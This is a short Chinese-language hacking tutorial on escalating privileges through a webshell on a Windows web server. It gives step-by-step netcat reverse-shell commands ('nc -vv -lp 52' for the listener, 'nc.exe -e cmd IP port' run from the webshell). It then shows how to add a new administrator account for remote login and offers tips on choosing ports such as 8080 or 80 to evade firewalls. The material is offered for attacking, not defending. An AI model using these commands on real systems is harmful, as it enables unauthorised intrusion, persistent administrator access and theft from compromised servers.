Server-U等都不可以用的情況下. 一般都可思考用此方法
不過這種方法, 只要對方裝了防火牆, 或是屏蔽掉了除常用的那幾個端口外的所有端口… 那么這種方法也失效了….
1:通過shell將上傳NC和CMD傳到站點目錄下(這里一定上傳的注意權限,最好是可讀寫目錄下)
web目錄都是有寫有讀的權限,我們直接傳NC進去
2:然后本地執行nc -vv -lp 52進行反彈
3:在shell命令下執行
F:\wwwroot\img\nc.exe -e cmd上傳路徑 IP(外網IP) 52(這里是本機端口)
4:在shell里執行命令后,馬上看到本地CMS里已經反彈上去了,執行net user 也是成功.
5:直接添加用戶,然后遠程去連接!
看到添加成功,也設置為管理組了!接下來直接遠程連接就OK!
不少人NC提權沒有成功過,因為其中的原因是你沒有降低權限,而導致了NC提權失敗
失敗總結:
1.反彈端口
網上不少文章寫 反彈端口445 110 什么的,你當防火牆白痴是不是,我建議看一下端口有沒有8080端口,如果沒有8080端口的話,要反彈8080
端口,這樣被防火牆阻止的概率較小
2.降低運行權限
1.現在本地監聽一個端口
nc -vv -l -p 8080 //最好是80或8080這樣的端口,被防火牆攔截的幾率很小。
2.在WebShell運行下面命令連接我們監聽的端口得到CmdShell:
nc -vv IP 8080 -e C:\Documents and Settings\All Users\Documents\cmd.exe //假設cmd.exe是上傳在"C:\Documents and Settings\All
Users\Documents\"這個目錄